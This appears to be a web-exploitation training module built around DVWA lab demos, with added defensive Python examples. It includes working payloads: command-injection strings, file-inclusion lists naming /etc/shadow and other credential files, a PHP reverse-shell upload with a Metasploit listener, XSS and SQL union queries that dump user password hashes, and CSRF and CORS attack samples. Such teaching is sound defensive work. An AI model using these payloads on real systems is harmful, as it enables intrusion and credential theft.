C3SA_Module_03_V1
WEB APPLICATION
EXPLOITATION
Internet Workflow
Web Application Working
Content Management Systems
➤ It offers a flexible, back-end interface for users to edit, modify, and publish
content on a website.
➤ Outdated version
➤ Inexperienced Administrators
➤ Malicious Plugins
➤ Phishing Attempts
https://github.com/vavkamil/dvwp
https://www.wordfence.com/blog/2018/12/wordpress-botnet-attacking-wordpress/
Custom Code (from scratch)
➤ The main aim is to identify the attack vectors that can be leveraged
externally
Web Application attack surface (diagram, reconstructed as text):
■ Public Users: external-facing attack point
■ Privileged Users: internal-facing attack point
■ Aspects to study for each: Purpose, Implementation, Design, Technology
➤ Points worth investing time in:
■ Login/Logout fields
■ Admin spaces
■ Logic workflow, management etc.
➤ Validate the findings (workflow)
Vulnerability classes covered (diagram, reconstructed as a list):
■ File Upload
■ Directory Traversal
■ Server-side Request Forgery (SSRF)
■ SQL Injection
■ Information Disclosure
■ Command Injection
■ Client-Side Vulnerabilities: Clickjacking, Cross-site Request Forgery (CSRF), Cross-Origin Resource Sharing (CORS), Cross-site Scripting (XSS)
Understanding the Request-Response Model
■ Burpsuite
■ Foxy-Proxy
Introduction to Burpsuite
➤ When we type a URL in our browser and hit Enter to view a web page, the browser makes an HTTP request.
➤ PUT: the PUT method is used when the user wants to replace whatever currently exists at the target URL with the request body.
HTTP Request Method
➤ HEAD: the HEAD method is identical to GET, but the response contains only the headers and no body.
Quick Tip: curl can be told to send an OPTIONS request, whose response lists all the methods allowed on a specific resource.
➤ The Host request header specifies the domain name of the server and
the TCP port number on which the server is listening.
➤ If the request is made to the web server over HTTPS and no port is given, the default port for that scheme is implied.
➤ The Accept request header advertises which content types, expressed as MIME types, the client (by client we mean the browser) is able to understand.
➤ For instance, our browser (client) can understand en-US (US English), which it advertises in the Accept-Language header.
HTTP Accept Encoding Header
➤ To send large data over HTTP efficiently, the data is encoded (compressed). The browser or client specifies the encoding algorithms it accepts.
➤ The Cookie request header, sent by the browser, contains the HTTP cookies previously sent by the server with the Set-Cookie header.
➤ There are many other HTTP request headers that can be used when sending an HTTP request to the server.
➤ A typical set of HTTP response headers looks like the headers shown in the figure below.
HTTP Response Code
➤ The server replies with a response (status) code which tells the browser what type of response the server has sent.
FoxyProxy: Proxy Management tool
➤ We just need to go to the options bar and click it, and we will be greeted with the options to configure FoxyProxy.
Adding a proxy configuration in FoxyProxy
➤ We need to provide all the options required to configure and add the proxy. Then we are done; we just need to switch the proxy on.
Lab Setup
➤ Make sure that the metasploitable VM is ready & accessible from Parrot
Machine.
➤ Gaining some level of control of a site by controlling the website or web application code is referred to by the term "Web Exploitation".
➤ Web pentesting can be done with automated scanners or manually; both have their own pros and cons, which we will look at in a moment.
➤ The server which hosts the website is called web server and typically
listens on TCP port 80. In some cases, the service could be configured to
run on ports other than the default one, as a small step towards security.
➤ The client, via the browser, connects to that port, and the two can then communicate and transfer data between each other.
➤ One can find the vulnerable CMS version using a query and then search for any publicly available websites.
➤ The following vulnerabilities will be covered in the next slides: -
■ Cross Site Scripting
■ SQL Injection
■ Code Injection vulnerability
■ File inclusion
■ Brute-force of website parameters/fields
■ File Upload vulnerability
➤ All the above-mentioned vulnerabilities are of high severity, and reputed companies like Facebook, Google etc. pay bounties when they are disclosed to them.
➤ Code Injection Vulnerability: -
It generally occurs where a website has an input parameter field. The goal is the execution of arbitrary commands on the host operating system via a vulnerable application. This is possible when an application passes unsafe user-supplied data to a system shell.
■ It can be used to compromise other parts of the network and then pivot to other systems within the organization.
■ It can lead to full takeover of the web server running the website.
Source: https://portswigger.net
Demo
Attacker Machine (IP: 192.168.100.140) and server vulnerable to command execution (IP: 192.168.100.141)
➤ There is a ping utility which takes an IP address as input and checks whether the host is alive or not.
➤ As you might have noticed, this utility is written in PHP (a popular server-side language). Let's check the source code of the PHP that handles the request.
➤ The code starts by checking the input given to the field (in the form of an IP address) and the OS running on the server side.
➤ The ping command runs 3 times, which means the backend OS is not Windows; it is likely a Linux server.
➤ Now try to execute another command while giving the IP address as input; there are 2 ways to execute two commands in one line.
Example: -
ls; whoami
ls | whoami
➤ The first form executes both commands and shows both outputs; with the second, only the output of the last command is shown.
➤ Case 1: - <IP address> ; Injection_command
➤ The command injection works and our command is executed on the web server.
➤ Case 2: <IP address> | Injection_command
➤ Only the injected command's output is shown in this case. Because of this vulnerability one can also establish a communication channel or deliver payloads directly to the web server.
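The root cause above is the raw field value being glued into a shell command. The following is an added example (not code from the course or from DVWA) that models the flawed pattern beside the hardened form, with a small detection helper for reviewing request logs; the metacharacter list and sample inputs are constructed here.

```python
import ipaddress
import re
import subprocess

# Shell metacharacters that turn a single "ping" argument into a second command.
SHELL_META = re.compile(r"[;|&`$()<>\n]")


def vulnerable_ping_command(ip: str) -> str:
    """The flawed pattern from the demo: the raw field value is glued into a shell
    line (which the application then runs through a shell), so ';' or '|' chain
    a second command. Returned as a string here; never executed in this example."""
    return "ping -c 3 " + ip


def safe_ping_argv(ip: str) -> list:
    """Hardened form: accept only a literal IP address, then build an argv list
    that is run without a shell, so metacharacters are never interpreted."""
    addr = ipaddress.ip_address(ip.strip())  # ValueError on "1.1.1.1; whoami"
    return ["ping", "-c", "3", str(addr)]


def looks_injected(value: str) -> bool:
    """Detection helper for reviewing request logs: flag a ping-field value that
    carries shell metacharacters such as ';' or '|'."""
    return SHELL_META.search(value) is not None


def run_ping(ip: str) -> int:
    """Execute the validated command (shell=False) and return its exit status."""
    return subprocess.run(safe_ping_argv(ip), capture_output=True, timeout=15).returncode


if __name__ == "__main__":
    # Constructed inputs: one legitimate address and two injection attempts.
    for candidate in ("192.168.100.141", "192.168.100.141; whoami", "192.168.100.141 | id"):
        verdict = "flagged" if looks_injected(candidate) else "clean"
        print(f"{candidate!r}: {verdict}")
```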
➤ File Inclusion Vulnerability: -
This is caused by a mistake made by the developer when writing the application's file-inclusion logic. Local files of the system (which files depends on the operating system) can be included directly through the web application, leading to sensitive information disclosure.
Source: https://portswigger.net
➤ Here is a list of some of the important files to look for once the vulnerability has been identified.
➤ Payload list if the target server is Windows: -
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
➤ Payload list if the target server is Linux: -
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
Attacker Machine (IP: 192.168.100.140) and server vulnerable to Directory Traversal (IP: 192.168.100.141)
➤ Head straight to the following URL: -
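As an added example (not from the course material), this is how an include parameter can be confined to one directory so that the payloads listed above are refused, plus a log-review check for traversal-looking values. The `pages` directory and the `home.php` file are constructed for the demo.

```python
import os
import tempfile


def resolve_include(base_dir: str, requested: str) -> str:
    """Return the real path of `requested` only if it stays inside base_dir.
    Absolute paths, null bytes and '..' hops that leave the directory are refused."""
    if "\x00" in requested or os.path.isabs(requested):
        raise ValueError("rejected: absolute path or null byte")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("rejected: path escapes the include directory")
    return target


def is_traversal_attempt(param: str) -> bool:
    """Detection helper for log review: does the page parameter look like one of
    the payloads above (parent-directory hops, absolute Unix or Windows paths,
    URL-encoded dots)?"""
    p = param.lower()
    return ".." in p or p.startswith("/") or p[1:2] == ":" or "%2e" in p


def demo() -> dict:
    """Constructed include directory with one legitimate page; returns a verdict per request."""
    with tempfile.TemporaryDirectory() as tmp:
        pages = os.path.join(tmp, "pages")
        os.makedirs(pages)
        with open(os.path.join(pages, "home.php"), "w") as fh:
            fh.write("<?php echo 'home'; ?>")
        verdicts = {}
        for req in ("home.php", "../../../../etc/passwd", "/etc/passwd"):
            try:
                resolve_include(pages, req)
                verdicts[req] = "allowed"
            except ValueError:
                verdicts[req] = "rejected"
        return verdicts


if __name__ == "__main__":
    for req, verdict in demo().items():
        print(f"{req:28} {verdict}")
```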
■ Social networking websites like Facebook, Twitter & Instagram allow users to
upload images and videos.
■ In case of improper validation of files, the attacker can upload malicious files to
the server which can lead to full compromise and access to sensitive
information present in the server.
➤ Generally, web shells are uploaded to the server end.
➤ Web shells are programs that allow an attacker to perform various malicious operations such as running shell commands, creating files, deleting files, downloading sensitive files etc.
➤ Let's try to bypass it with another extension. The code that uploads the file is written in PHP, and it also reveals the path to which the file is uploaded.
Note: Disclosing any server directory to the end user can pose a huge risk.
➤ The PHP code which uploads the file to the server is misconfigured: the file type is not checked anywhere.
➤ Once the payload is generated and saved as a PHP file, start a listener in Metasploit.
➤ Start the listener on port 443; this must be the same port used during payload generation.
➤ Upload the malicious PHP payload to the server.
➤ The path with the exact file name is also disclosed on the portal, so once it is uploaded our shell is just one click away.
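The missing check in the upload code is the point to fix. Below is an added example (not the course's PHP) of an upload validator that checks the extension against an allowlist, sniffs the real content, and stores the file under a random name so neither path nor name is attacker-chosen; the image magic numbers are standard, and the PNG header and harmless PHP text are constructed samples.

```python
import os
import secrets

ALLOWED_EXT = {".png", ".jpg", ".gif"}
MAGIC = {                      # leading bytes of the image formats we accept
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

# Constructed samples: a minimal PNG header and a harmless PHP file standing in for a web shell.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
PHP_SAMPLE = b"<?php echo 'constructed test file'; ?>"


def sniff_type(data: bytes):
    """Identify the content by its magic bytes, ignoring the client-supplied name."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(filename: str, data: bytes) -> str:
    """Hardened upload check. Returns a random server-side file name; the client's
    name and path are never reused, so the storage location is not attacker-chosen."""
    ext = os.path.splitext(filename)[1].lower()
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: " + ext)
    sniffed = sniff_type(data)
    if sniffed is None:
        raise ValueError("content is not a supported image")
    if sniffed != ext:
        raise ValueError("extension does not match file content")
    return secrets.token_hex(8) + ext


def check(filename: str, data: bytes) -> str:
    """Verdict string for a candidate upload (used by the self-test below)."""
    try:
        return "accepted as " + validate_upload(filename, data)
    except ValueError as exc:
        return "rejected: " + str(exc)


if __name__ == "__main__":
    for name, data in (("shell.php", PHP_SAMPLE), ("shell.png", PHP_SAMPLE), ("pic.png", PNG_SAMPLE)):
        print(name, "->", check(name, data))
```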
■ In Addition, the attacker can send input (e.g., username, password, session ID,
etc) which can be later captured by an external script.
➤ The victim's browser has no way to know that the script should not be
trusted, and will execute the script. Because it thinks the script came from
a trusted source, the malicious script can access any cookies, session
tokens, or other sensitive information retained by the browser and used
with that site.
➤ We will study Reflected & Stored XSS in the course, DOM based XSS is out
of scope.
https://insecure-site.com/status?message=<script>/*+Bad+stuff+here+*/</script>
➤ This can have disastrous consequences, as this crafted link can be sent to the victim and the attacker can then execute their own JavaScript targeting the user.
<p>Status: <script>/* Bad stuff here */</script></p>
Demo – Reflected XSS
➤ When the input parameter is tested with some input data, we get the following result: -
➤ This means the output is reflected and the application does not perform any other processing of the data. The parameter can also be identified by looking at the URL: -
➤ Let's try to control the application flow using some JavaScript code which simply pops an alert in the user's browser. Ex: <script>alert(1)</script>
➤ Every time the infected page is visited, the malicious script injected by the attacker is sent to the victim's browser.
➤ Let's now have a look at the lab setup for this scenario: -
➤ There are two input parameters, 'Name' and 'Message', on the web page affected by stored XSS.
➤ After checking for input data reflection, it is seen that both the 'Name' and 'Message' parameters are reflected; however, there is a length limit set on the 'Name' parameter.
➤ Let's try to inject our malicious payload to test for XSS in the 'Message' field.
➤ Now if we fill in 'Name' and submit the information, the value of the 'Message' box is reflected and we can see that our injected payload works.
➤ The interesting thing here is that if you browse to any other page and then return to the stored XSS vulnerable page, you will again get your malicious code running.
➤ This happens each and every time the victim visits the vulnerable page.
➤ This will stop when the user's session ID expires and they need to re-enter the input.
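Both demos come down to untrusted text being written into HTML unencoded. The following added example (not the course's code) models the reflected status page and the stored Name/Message guestbook, each with the vulnerable rendering beside the encoded one; the `NAME_MAX_LEN` value is an assumption standing in for the demo's unnamed limit.

```python
import html

NAME_MAX_LEN = 10  # assumed server-side limit for 'Name'; the demo's exact value is not given


def reflect_status_vulnerable(message: str) -> str:
    """Reflected XSS: the query parameter is copied straight into the page."""
    return f"<p>Status: {message}</p>"


def reflect_status_safe(message: str) -> str:
    """Fix: HTML-encode untrusted data at the point it is written into HTML."""
    return f"<p>Status: {html.escape(message, quote=True)}</p>"


class Guestbook:
    """Stored XSS model of the Name/Message form: entries persist and are rendered to every visitor."""

    def __init__(self) -> None:
        self.entries = []

    def add(self, name: str, message: str) -> None:
        # The text is stored as typed; a length limit only constrains size, it is not an XSS defence.
        if len(name) > NAME_MAX_LEN:
            raise ValueError("name too long")
        self.entries.append((name, message))

    def render_vulnerable(self) -> str:
        return "".join(f"<p><b>{n}</b>: {m}</p>" for n, m in self.entries)

    def render_safe(self) -> str:
        return "".join(f"<p><b>{html.escape(n)}</b>: {html.escape(m)}</p>" for n, m in self.entries)


if __name__ == "__main__":
    book = Guestbook()
    book.add("tester", "<script>alert(1)</script>")  # constructed visitor input
    print(book.render_vulnerable())
    print(book.render_safe())
```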
➤ SQL Injection: -
SQL injection is a web security vulnerability that allows an attacker to interfere with or manipulate the queries that an application makes to its database. Basically it is a code injection technique that exploits a security vulnerability in an application's software.
Reference: portswigger.net
➤ Basically, this happens because of improper validation of input from the user end.
➤ There might be some kind of logical error that the attacker exploits to retrieve sensitive information from the database.
➤ Let's learn some basic SQL commands to get started with exploiting the SQL server.
➤ SQL command basics: -
➤ Let's enter '1' as input in the given field and check the response. Note that the application uses an SQL query to connect to the backend database.
➤ Try to find out all the user IDs available in the database.
➤ After entering the numbers 1 to 5 as input in the field, the following information is displayed by the server.
➤ Let's test for SQLi possibilities with an always-true condition, using the following payload: -
$' or '1'='1
➤ The output is the list of all available usernames with their associated user IDs.
➤ It can be seen that there are a total of 5 entries in the database.
➤ Now, to identify the database and its version running at the backend: the error shows that the backend database is SQL
➤ We will use a 'union' query to execute two or more statements at the same time.
6767' or 5=1 union select null, version()#
➤ 6767 is a random input value and ' (the single quote) terminates the string in the first query.
➤ null is just a placeholder, because the first query has 2 fields labelled First_Name and surname. We have 2 positions to fill but need only 1, hence null is placed.
➤ The user context under which the service is running can also be identified.
➤ The SQL service on the server is running as root (a highly privileged user).
➤ We will try to identify the database name using the database() function. The whole query stays the same; we just need to substitute the above function into it.
6767' or 5=1 union select null, database()#
➤ 'dvwa' is the name of the database connected to the vulnerable application.
➤ Let's now enumerate the tables that this database contains. information_schema.tables is a MySQL table that contains the list of tables in each database.
➤ The table_name column returns the names of the tables in the database.
➤ Let's alter our query so that it includes all the tables from the identified database.
6767' or 5=1 union select null, concat(user, 0x0a, password) FROM users#
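To see why the always-true and union payloads work, here is an added example (not the course's PHP) that rebuilds the two-column user lookup on an in-memory SQLite table and runs the concatenated query beside a parameterised one. The five rows are constructed; SQLite is used so it runs offline, hence the union payload uses `--` as the comment and `sqlite_version()` in place of MySQL's `#` and `version()`.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the demo's users table: 5 rows, as the slides report."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "one"), (2, "bob", "two"), (3, "carol", "three"),
         (4, "dave", "four"), (5, "eve", "five")],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """The flawed pattern: the field value is concatenated into the SQL text,
    so a quote in the input ends the string and the rest is parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, user_id: str) -> list:
    """Fix: a parameterised query; the value is bound as data, never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("normal       :", lookup_vulnerable(con, "1"))
    print("always-true  :", lookup_vulnerable(con, "1' or '1'='1"))
    print("union        :", lookup_vulnerable(con, "6767' union select null, sqlite_version()--"))
    print("parameterised:", lookup_safe(con, "1' or '1'='1"))
```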
➤ Information Disclosure
It is a type of information leakage, where a website exposes sensitive information to end users unintentionally.
■ Any critical information like PII, patient records, business information etc.
Information Disclosure
➤ Cross Site Request Forgery
■ Based on identification of the induced flow, the attacker crafts a special request and somehow induces users to click on the link.
■ Applications have session cookies to identify user requests. However, tracking of the user's session remains unmanaged.
<CAPTURED REQUEST>
POST /email/change HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Cookie: session=aksgdg7ewgfkljaslkgfpiwept
email=master@admin-user.com
<HTML CODE>
<html>
<body>
<form action="https://vulnerable-app.com/email/change"
method="POST">
<input type="hidden" name="email"
value="fake_user@xyz.net" />
</form>
<script> document.forms[0].submit();</script>
</body>
</html>
Hands-on Demonstration: CSRF
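The captured request succeeds because the browser attaches the session cookie regardless of which page built the form. As an added example (not from the course), this is a server-side handler for `/email/change` that rejects the forged submission by requiring a per-session token the cross-site page cannot obtain, plus an Origin check. `SERVER_SECRET` is a constructed placeholder and the session value is the one from the captured request.

```python
import hashlib
import hmac

SERVER_SECRET = b"constructed-server-secret"  # assumption: a secret known only to the server
SITE_ORIGIN = "https://vulnerable-app.com"


def csrf_token_for(session_id: str) -> str:
    """Derive a per-session anti-CSRF token (HMAC over the session id). The real form
    embeds it in a hidden field; a page on another origin cannot read it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def same_site_request(headers: dict) -> bool:
    """Secondary check: the Origin (or Referer) of the POST must be our own site.
    Browsers send Origin on cross-site POSTs, so a missing header is also refused."""
    origin = headers.get("Origin") or headers.get("Referer", "")
    return origin == SITE_ORIGIN or origin.startswith(SITE_ORIGIN + "/")


def handle_email_change(session_id: str, headers: dict, form: dict) -> str:
    """Server-side handler for POST /email/change with both checks applied."""
    if not same_site_request(headers):
        return "403 rejected: cross-site origin"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token_for(session_id)):
        return "403 rejected: missing or invalid CSRF token"
    return "200 email changed to " + form["email"]


if __name__ == "__main__":
    sid = "aksgdg7ewgfkljaslkgfpiwept"  # session cookie value from the captured request
    forged = handle_email_change(sid, {"Origin": "https://malicious-site.com"},
                                 {"email": "fake_user@xyz.net"})
    legit = handle_email_change(sid, {"Origin": SITE_ORIGIN},
                                {"email": "master@admin-user.com", "csrf_token": csrf_token_for(sid)})
    print(forged)
    print(legit)
```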
➤ Misconfigured Cross Origin Resource Sharing
■ Attackers can validate this using a simple header injection (supplying their own Origin) and access sensitive information that the website presents to whitelisted domains.
GET /sensitive-victim-data HTTP/1.1
Host: vulnerable-app.com
Origin: https://malicious-site.com
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://malicious-site.com
Access-Control-Allow-Credentials: true ...
➤ In the above example, the response header states that access is allowed from the attacker-controlled domain.
➤ The attacker can therefore steal the sensitive information, as the CORS setup is misconfigured.
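The response above is what an origin-reflecting server produces. The following added example (not from the course) models that policy, a prefix-matching half-fix that is still bypassable by a lookalike host, and an exact allowlist, and checks which one lets a cross-origin page read a credentialed response; the allowlist entries and the lookalike origin are constructed.

```python
ALLOWED_ORIGINS = {"https://vulnerable-app.com", "https://partner.example"}  # constructed allowlist
SITE = "https://vulnerable-app.com"


def cors_reflect_any(origin: str) -> dict:
    """Misconfiguration from the slide: whatever Origin arrives is echoed back together
    with Allow-Credentials, so any site can read the authenticated response."""
    return {"Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true"}


def cors_prefix_match(origin: str) -> dict:
    """A common half-fix that is still broken: a prefix check lets
    https://vulnerable-app.com.malicious-site.com through."""
    if origin.startswith(SITE):
        return {"Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true"}
    return {}


def cors_allowlist(origin: str) -> dict:
    """Fix: exact match against a fixed allowlist; unknown origins get no CORS headers at all."""
    if origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}


def cross_origin_readable(origin: str, headers: dict) -> bool:
    """Would a browser let a page at `origin` read a credentialed response with these headers?"""
    return (headers.get("Access-Control-Allow-Origin") == origin
            and headers.get("Access-Control-Allow-Credentials") == "true")


if __name__ == "__main__":
    origins = ("https://malicious-site.com",
               "https://vulnerable-app.com.malicious-site.com",
               "https://partner.example")
    for policy in (cors_reflect_any, cors_prefix_match, cors_allowlist):
        for origin in origins:
            readable = cross_origin_readable(origin, policy(origin))
            print(f"{policy.__name__:18} {origin:48} readable={readable}")
```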
CORS
➤ Click Jacking
■ Attackers will redirect you to a website from which they gain financially, obtain sensitive information etc.
■ The websites are crafted so well that it is difficult to identify the legitimate one.
Hands-on Demonstration: IDN Homograph Attack
Module 3 : Capstone Project
➤ Download DVWA locally in a VM and exploit all the OWASP Top 10 vulnerabilities.
➤ Try to document the exploitation of Code Injection in DVWA from the easy to the hard level. Share it in PDF format.
➤ Use "httpx" to check the top 1000 ports across all the subdomains and submit the result as a list in an Excel file.
Thank You
For Professional Red Team / Blue Team / Purple Team,
Cloud Cyber Range labs / Courses / Trainings, please contact
info@cyberwarfare.live